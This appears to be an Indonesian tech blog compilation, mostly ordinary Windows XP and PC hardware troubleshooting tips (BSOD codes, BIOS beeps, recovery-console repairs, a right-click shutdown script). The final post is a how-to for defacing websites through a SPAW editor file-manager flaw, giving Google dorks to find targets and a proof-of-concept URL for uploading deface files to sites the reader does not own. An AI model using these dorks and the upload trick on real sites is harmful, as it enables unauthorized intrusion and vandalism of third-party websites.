14. Pasang Processor Baru Tp Tidak Terdeteksi

Cara Mengatasinya :

- cek apakah anda sudah memasang processor denan benar

- cek apakah posisi jumper pada processor sudah benar (tentang jumper pada processor bisa anda priksa pada manual booknya)



15. Crash Setelah Memasang RAM Baru

Cara Mengatasinya :

- kemungkinan ram yang anda pasang tidak kompatibel dengan komputer anda (cabut ram tersebut)



16. Menambah RAM Tapi Tidak Terdeteksi

Cara Mengatasinya :

- Lakukan pengecekan seperti ketika kasus sebelumnya

- Pastikan slot yan dipakai sesuai, misalnya : SD RAM memiliki slot yang hampir sama dengan RD RAM tetapi RD RAM, tidak bisa terdeteksi meskipun bisa dipasang pada slot jenis SD RAM.



17. Setelah Menambah RAM Proses Komputer Manjadi Semakin Lambat

Cara Mengatasinya :

- perhatikan batas kapasitas ram anda, misalnya ram jenis EDO batas maksimalnya adalah 64 MB, maka ketika dipaksakan untuk ditambah maka komputer anda menjadi semakin lambat



18. Virtual Ram

Cara Mengatasinya :

- klik kanan icon My computer, pilih propertis, kemudian pilih tab performance dan klik VIRTUAL MEMORY

- pilih item let me specify my own virtual memory setting (pilih HD yang akan digunakan sebagai virtual memory)

- klok OK



19. Monitor Tidak Mau Nyala

Cara Mengatasinya :

- pastikan semua kabel power maupun konektor yang berhubungan dengan monitor ok

- pastikan juga pin yang ada pada port VGA masuk dengan sempuran tidak ada yang bengkok apalagi tidak masuk semua/salah satu pin ke port VGA

- pastikan juga VGA card anda ok



20. Monitor Menjadi Gelap Saat Loading Windows

Cara Mengatasinya :

- kemungkinan disebabkan karena setup driver untuk monitor tidak tepat(setting frekuensinya terlalu tinggi)

- masuk dulu ke dalam kondisi safe mode (tekan F8)

- install ulang driver VGAnya



21. Tampilan Tiba-Tiba Rusak Dan Komputer Manjadi Hang

Cara Mengatasinya :

- dikarenakan suhu (pada VA card) sangat panas



22. Ukuran Tampilan monitor Tidak Sesuai Keinginan

Cara Mengatasinya :

- masuk ke display propertis (klik kana semabrang tempat pilih propertis)

- Tekan tab setting dan dan atur ukuran tampilan sesuai dengan keinginan (pada screean area)



23. Monitor Seperti Berkedip Saat Digunakan

Cara Mengatasinya :

- masuk ke display propertis (klik kana semabrang tempat pilih propertis)

- Tekan tab setting dan klik advance, kemudian klik adapter, pada bagian ini ditampilkan refresh raet yang dininkan



24. Sound Card Baru Tidak Terdeteksi

Cara Mengatasinya :

- Crash dengan saounda card yang lama

- cek pada manual booknya, apakah soundcard on boardnya perlu dimatikan atau tidak jika hendak menginstall ulang soundcard yan baru (biasanya bisa dimatikan lewat jumper atau bios)

Cara memperbaiki windows XP tanpa instal ulang

1. Memperbaiki Instalasi (Repair Install)

Jika Windows XP Anda rusak (corrupted) dimana Anda tidak mempunyai sistem operasi lain untuk booting,
Anda dapat melakukan perbaikan instalasi (Repair Install) yang bekerja sebagaimana setting (pengaturan)
yang awal.

- Pastikan Anda mempunyai kunci (key) Windows XP yang valid.
- Keseluruhan proses akan memakan waktu kurang lebih 1/2 atau 1 jam, tergantung spek komputer Anda.
- Jika Anda dimintai password administrator, sebaiknya Anda memilih opsi perbaikan (repair) yang kedua,
bukan yang pertama.
- Masukkan CD Windows XP Anda dan lakukan booting dari CD tersebut.
- Ketika sudah muncul opsi perbaikan kedua R=Repair, tekan tombol R
Ini akan memulai perbaikan.
- Tekan tombol F8 untuk menyetujui proses selanjutnya "I Agree at the Licensing Agreement"
- Tekan tombol R saat direktori tempat Windows XP Anda terinstal. Biasanya C:\WINDOWS
Selanjutnya akan dilakukan pengecekan drive C: dan mulai menyalin file-file.
Dan secara otomatis restart jika diperlukan. Biarkan CD Anda dalam drivenya.
- Berikutnya Anda akan melihat sebuah gambar "progress bar" yang merupakan bagian dari perbaikan,
dia nampak seperti instalasi XP normal biasanya, meliputi "Collecting Information, Dynamic Update,
Preparing Installation, Installing Windows, Finalizing Installation".
- Ketika ditanya, klik tombol Next
- Ketika ditanya untuk memasukkan kunci, masukkan kunci (key) Windows XP Anda yang valid.
- Normalnya Anda menginginkan tetap berada dalam nama Domain atau Workgroup yang sama.
- Komputer akan restart.
- Kemudian Anda akan mempunyai layar yang sama sebagaimana pengaktifan sistem ketika instalasi normal.
- Register jika Anda menginginkannya (biasanya tidak diperlukan).
- Selesai

Sekarang Anda bisa log in dengan account Anda yang sudah ada.

__________________________________________________ __________________________________________________ ___


2. NTOSKRNL Rusak atau Hilang (Missing or Corrupt)

Jika Anda mendapati pesan error bahwa "NTOSKRNL not found" / NTOSKRNL tak ditemukan, lakukan:
- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Pindahlah ke drive CD Drive Anda berada.
- Tulis: CD i386
- Tulis: expand ntkrnlmp.ex_ C:\Windows\System32\ntoskrnl.exe
- Jika Windows XP Anda terinstal di tempat lain, maka ubahlah sesuai dengan lokasinya.
- Keluarkan CD Anda dan ketikkan EXIT

__________________________________________________ __________________________________________________ ___


3. HAL.DLL Rusak atau Hilang (Missing or Corrupt)

Jika Anda mendapatkan error berkenaan dengan rusak atau hilangnya file hal.dll, ada kemungkinan
file BOOT.INI mengalami salah konfigurasi (misconfigured).

- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Tulis: bootcfg /list
Menampilkan isi/masukan pada file BOOT.INI saat ini
- Tulis: bootcfg /rebuild
Memperbaiki konfigurasi dari file BOOT.INI
- Keluarkan CD Anda dan ketikkan EXIT

__________________________________________________ __________________________________________________ ___

4. Direktori \WINDOWS\SYSTEM32\CONFIG rusak atau hilang

Jika Anda mendapatkan error dengan tulisan:

"Windows could not start because the following files is missing or corrupt
\WINDOWS\SYSTEM32\CONFIG\SYSTEM or \WINDOWS\SYSTEM32\CONFIG\SOFTWARE"

- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Masukkan password administrator jika diperlukan.
- Tulis: cd \windows\system32\config
- Berikutnya tergantung di bagian mana letak terjadinya kerusakan:
- Tulis: ren software software.rusak ATAU ren system system.rusak
- Berikutnya lagi juga tergantung di bagian mana letak terjadinya kerusakan:
- Tulis: copy \windows\repair\system
- Tulis: copy \windows\repair\software
- Keluarkan CD Anda dan ketikkan EXIT

__________________________________________________ __________________________________________________ ___

5. NTLDR atau NTDETECT.COM tak ditemukan (NTLDR or NTDETECT.COM Not Found)

Jika Anda mendapati error bahwa NTLDR tak ditemukan saat booting:

a. Untuk partisi tipe FAT
- Silakan Anda melakukan booting dari disket Win98 Anda dan salinlah file NTLDR atau NTDETECT.COM
dari direktori i386 ke drive induk/akar (root) C:\

b. Untuk partisi tipe NTFS
- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Masukkan password administrator jika diperlukan.
- Masukkan perintah berikut, dimana X: adalah alamat drive dari CD ROM Anda (Sesuaikan!).
- Tulis: COPY X:\i386\NTLDR C\:
- Tulis: COPY X:\i386\NTDETECT.COM C:\
- Keluarkan CD Anda dan ketikkan EXIT

Error codce dalam BSOD

1. IRQL_NOT_LESS_OR_EQUAL (0X0000000A)
Ini merupakan biangnya biang kerok pada BsOD. Kenapa? Karena umumnya pada BsOD, pesan ini yang paling sering muncul. Pesan kesalahan ini disebabkan umumnya kerena ada ketidakcocokan driver yang terinstall di komputer.

Daftar Penyebab:
[+] Masalah driver yang bentrok atau tidak cocok
[+] Masalah Video Card, hal ini mencakup video card yang di overclock melebihi batas atau Anda baru berganti Video card dan Anda belum menguninstall driver Video card lama dari chipset berbeda
[+] Masalah Audio Card, meliputi kesalahan konfigurasi atau bug dalam driver sound card

2. NTFS_FILE_SYSTEM atau FAT_FILE_SYSTEM (0X00000024) atau (0X00000023)
Nah, pesan ini setidaknya sudah sedikit “nyambung” memberikan gambaran di mana kerusakan berada, yaitu ada di partisi atau filesystemnya tetapi bukan di harddisknya. Kita bisa melakukan pengecekan dengan memeriksa kabel SATA atau PATA atau bisa mengecek partisi dengan tool chkdsk.


3. UNEXPECTED_KERNEL_MODE_TRAP (0X0000007F)
Bila Anda mendapatkan pesan seperti ini, dapat disebabkan karena:
[+] Overclock Hardware yang berlebihan
[+] Komponen komputer yang kepanasan
[+] BIOS yang korup
[+] Memory dan CPU yang cacat


4. DATA_BUS_ERROR
Pesan ini disebabkan karena adanya kemungkinan bahwa memory atau slot memory di motherboard rusak.


5. PAGE_FAULT_IN_NONPAGED_AREA
Disebabkan karena adanya kerusakan hardware, termasuk memory utama, memory video card, atau memory di processor (L2 Cache)


6. INACCESSIBLE_BOOT_DEVICE
Disebabkan karena adanya kesalahan dalam konfigurasi jumper harddisk yang salah, virus boot sector, driver IDE controller yang salah, atau kesalahan driver chipset.


7. VIDEO_DRIVER_INIT_FAILURE
Kesalahan terjadi pada instalasi driver video card yang kurang sempurna, restart pada saat instalasi atau juga dapat terjadi karena kesalahan dalam instalasi driver.


8. BAD_POOL_CALLER
Kesalahan ini dapat terjadi karena kesalahan atau driver yang tidak kompatibel. Sering terjadi saat melakukan instalasi XP dari upgrade, atau bukan dari instalasi baru.


9. PEN_LIST_CORRUPT
Pesan ini disebabkan karena adanya kerusakan RAM


10. MACHINE_CHECK_EXCEPTION
Disebabkan oleh cacatnya CPU, atau yang di overclock secara agresif, serta power supply yang kekurangan daya atau rusak.

Kenali kode beep pada BIOS

sering kali komputer kita mengalami bunyi beep,tapi kita tidak tau apa arti bunyi tersebut,,nak kali ini saya akan share arti suara code beep pada BIOS..silahkan di baca dan di pahami yah,biar klo komputernya ada masalah dan keluar bunyi beep kamu bisa mendeteksi kerusakannya .. :D

AMI-BIOS
Beep 1x : RAM rusak atau tidak terpasang dengan benar.
Beep 6x :Biasanya menunjukkan keyboard yang rusak, atau tidak terpasang dengan benar
Beep 8x :Graphic card rusak atau tidak terpasang dengan benar pada slot.
Beep 11x : Checksum-Error. Periksalah baterai CMOS pada motherboard.

Award-BIOS
Beep 1x panjang terus menerus :RAM rusak, atau tidak terpasang dengan benar.
Beep 1x panjang, 1x pendek :Ada masalah dengan RAM atau Motherboard
Beep 1x panjang, 2x pendek : Graphic card rusak atau tidak terpasang dengan benar
Beep 1x panjang, 3x pendek : Keyboard rusak atau tidak terpasang dengan benar
Beep 1x panjang, 9x pendek :Ada masalah dengan Bios / Bios rusak
Beep pendek Tak terputus :Ada masalah dengan penerimaan tegangan (power)

Phoenix-BIOS
Beep 1x-1x-4x :BIOS mengalami kerusakan.
Beep 1x-2x-1x :Motherboard rusak.
Beep 1x-3x-1x :Ram rusak atau tidak terpasang dengan benar.
Beep 3x-1x-1x :Motherboard rusak
Beep 3x-3x-4x :Graphic card rusak atau tidak terpasang dengan benar.

kalo ternyata yang bermasalah adalah RAM (memori) maka cabutlah memori RAM dan pasang lagi (apabila cara meletakkan RAM sebelumnya kurang baik atau tidak pas atau bergeser karena komputer dipindah-pindah). Perlakuan yang sama juga dapat dilakukan pada graphic card (kartu vga). Apabila setelah memperbaiki letak periferal (RAM dan kartu vga) tetapi bunyi beep masih berbunyi juga, kemungkinan besar periferal tersebut mengalami kerusakkan, maka bisa dicoba dengan periferal lainnya, kalo udah dicoba semua tapi tetep bunyi juga,beli lagi lah.. :D

Sabtu, 05 Maret 2011

Komputer tidak bisa di shutdown ?

Komputer tidak bisa shutdown alias komputer tidak mau mati, tidak mau “bobok” adalah masalah yang sangat sering terjadi. Yang paling stress adalah mereka yang termasuk kelas pemula. Ketika mencoba untuk log off, restart, atau shut down komputer berbasis Windows tidak memberi respon dan adakalanya proses shutdown ini hanya berjalan setengah perjalanan dan berhenti merespon sehingga komputer tidak benar-benar mati. Artinya Anda tidak bisa log off, tidak bisa restart, atau komputer tidak bisa shut down.
Jika Anda tidak mau pusing apa penyebabnya dan ingin segera mengatasi masalah ini, lalukan langkah-langkah berikut (langkah darurat):


1. Klik Start Menu -> Run -> ketik regedit
2. Buka HKEY_CURRENT_USER -> Control Panel -> Desktop
3. Klik dua kali pada PowerOffActive dan ubah nilai nya menjadi 1


nah pada masalah ini penyebabnya berbagai macam,,silahkan baca di bawah ini untuk mengetahui penyebab komputer tidak bisa di shutdown.

  1. Problem ini umumnya karena registry Fast Shutdown dalam kondisi aktif. Solusi; cobalah buka registry dan non-aktifkan Fast Shutdown.
  2. Setting pada BIOS. Saya pernah menemukan bahwa penyebabnya adalah setting tertentu pada BIOS. Solusi; ketika saya kembalikan setting BIOS keposisi default, ternyata komputer bisa dimatikan.
  3. Perilaku ini juga sering terjadi jika jika Anda menginstal beberapa antivirus dalam satu komputer terutama misalnya versi Norton Antivirus 2003 dulu yang menggunakan program ccApp.exe. Solusi; hendaknya Anda selektif menggunakan antivirus apalagi memasang lbih dari satu antivirus sekaligus dalam satu komputer, hal itu lumayan rawan. Bisa saja justru terjadi perang antivirus dalam komputer Anda. Jalan keluar adalah uninstall dan install ulang antivirus.
  4. Masih ada program yang sedang berjalan. Solusi; Terutama pada windows XP jika masih ada program yang belum ditutup, biasanya komputer menunggu kita untuk menutupnya barulah ia shut down.
  5. Device driver tidak kompatibel, rusak, atau konflik antar mereka. Solusi; Periksa device driver yang mungkin Anda baru pasang jangan sampai ini penyebabnya.
  6. Ada kesalahan adaptor video pada IRQ dalam modus real. Solusi; ganti VGA card.
  7. Masalah ini juga terjadi pada komputer yang mendukung Advanced Power Management (APM). Secara default, fitur ini tidak diaktifkan pada Windows XP. Jika BIOS di komputer Anda sudah diatur untuk APM, dan Anda meng-upgrade ke Windows XP, Anda menerima pesan ini ketika Anda shutdown komputer, dan kemudian komputer berhenti merespons.



Solusi untuk nomor 7;
1. Klik [Start], dan klik lagi [Control Panel].
2. Dalam Control Panel, klik [Performance and Maintenance], kemudian klik [Power Options].
3. Klik tab [APM].
4. Beri tanda centang pada [Enable Advanced Power Management Support] kemudian klik [OK].

semoga bermanfaat artikel yang saya share ini...

Trik Shutdown Komputer Dengan Klik Kanan

Pada kali ini saya akan memberikan trik komputer windows,yaitu shutdown komputer dengan klick kanan saja,,bagaimana caranya ??
langsung saja kita bahas cara shutdown dengan klik kanan..

pertama kamu copy script di bawah ini ke dalam notepad.

var vbCancel = 2;
var vbYesNoCancel = 3;
var vbYes = 6;
var vbNo = 7;
var vbQuestion = 32;
var vbInformation = 64;
var natan = WScript.CreateObject('WScript.Shell');
var kata = '.:: Sik4mpret Anak Kalong ::.';
var pesan1 = 'Terserah Mau Milih Yang mana:\n'+
'--------------------------\n\n'+
'1. Klik ["Yes"] -> untuk diPasang.\n'+
'2. Klik ["No"] -> untuk diCopot.\n'+
'3. Klik ["Cancel"] -> untuk Stop.\n\n'+
'> Pilihan Kamu? <'
var tanya = natan.popup(pesan1,0,kata,vbYesNoCancel+vbQuestion );
if (tanya == vbYes)
{
natan.RegWrite('HKCR\\Directory\\shell\\mati\\',
'> Matikan Windows!','REG_SZ');
natan.RegWrite('HKCR\\Directory\\shell\\mati\\comm and\\',
'shutdown.exe -s -t 0','REG_SZ');
natan.RegWrite('HKCR\\Drive\\shell\\mati\\',
'> Matikan Windows!','REG_SZ');
natan.RegWrite('HKCR\\Drive\\shell\\mati\\command\ \',
'shutdown.exe -s -t 0','REG_SZ');
pesan2 = 'Selesai di pasang!';
natan.popup(pesan2,0,kata,vbInformation);
}
else if (tanya == vbNo)
{
natan.RegDelete('HKCR\\Directory\\shell\\mati\\com mand\\');
natan.RegDelete('HKCR\\Directory\\shell\\mati\\');
natan.RegDelete('HKCR\\Drive\\shell\\mati\\command \\');
natan.RegDelete('HKCR\\Drive\\shell\\mati\\');
pesan3 = 'Selesai di copot!';
natan.popup(pesan3,0,kata,vbInformation);
}
else
{

pesan4 = 'Berhenti!';
natan.popup(pesan4,0,kata,vbInformation);
}


Simpan ShutdownKlik.js

Terus Cari File ShutdownKlik.js
untuk mengaktifkan tinggal double klik Atau Lewat Cmd.
caranya ketik command
> cscript ShutdownKlik.js

Cara Ngeliat perubahannya yaitu coba klik kanan di Start Menu, atau di salah satu drive
maupun folder yang terdapat di Windows Explorer. Disana kamu ntar ngeliat sebuah shortcut
yang dapat anda klik untuk menonaktifkan komputer.
Jika tidak menginginkan shorcut tersebut tampil di Start Menu atau Windows Explorer,
silahkan klik tombol No untuk menghapusnya.
Tetapi jika tidak ada keinginan untuk mengeksekusi program tersebut, silahkan klik tombol
Cancel untuk keluar.

Jumat, 04 Maret 2011

Pajenk alay text generator

Terinspirasi dari heran nya melihat bahasa alay yang bikin saya pusing muter2 bacanya,,,apa lagi klo di kirimin SMS yang pake bahasa dewa,,,huft pgn gw banting tuh HP rasanya,,,
saya iseng2 membuat program alay text generator,yang bisa merubah huruf normal menjadi bahasa 4L4Y yg gk karuan... hahahaha,,

langung aja download pajenk 4L4Y text generator dibawah ini ...



biar lebih maksimal jalan kan program dengan run as administrator..

Deface web dengan SPAW Vulnerably

Sekarang saya akan menerangkan bagaimana cara deface dengan mudah menggunakan vulnerably atau kelemahan dari sebuah web,dimana setiap web pasti ada celah untuk di susupi ,,,pada artikel sebelum nya juga saya pernah mengshare cara deface dengan mudah menggunakan Remote file upload opencart dan deface dengan metode aspx,mengapa dikatakan mudah,karena kamu tinggal mencari vuln atau kelemahan web nya saja,tanpa harus mencari username dan password admin nya,,caranya hampir sama seperti metode di atas yaitu mengupload sebuah file dengan menggukanan kelemahan suatu web...
langsung ke meterinya aja yah...pastinya kita membutuhkan dork untuk mencari target nya...
DORK
  1. inurl:spaw2/dialogs/ atau
  2. inurl:spaw2/uploads/files/
POC
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9

jika sudah menemukan targetnya contoh seperti ini :

lalu kamu ganti spaw2/uploads/files/Gen%20Home-2009-web%20(2).pdf%2016%20pages%20Final.pdf
dengan
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9

nanti akan muncul SPAW File Manager,lihat gambar di bawah ini

jangan lupa ganti type nya dari image ke File,dan kamu tinggal upload file kamu..
jika sudah trus di apain...??
yaudah selesai emang mau ngapain ??? heheheh
kidding,,
trus kamu lihat file kamu sudah masuk blom seperti gambar di bawah ini..




lalu bagaimana cara melihat hasil deface kita???
cara nya,kamu klick file yg sudah kamu upload,nanti akan ada tulisan download file di sebelah kanan,,dan kamu klick,,maka hasil file deface kamu akan keluar seperti ini..

KLICK DONK SAY...!!

udah dehh selesai deface nya,,gampang kan ???
mudah-mudahan artikel yang saya share ini menambah ilmu teman-teman smua,dan jangan di salah gunakan yah...
cheerrsss..!!!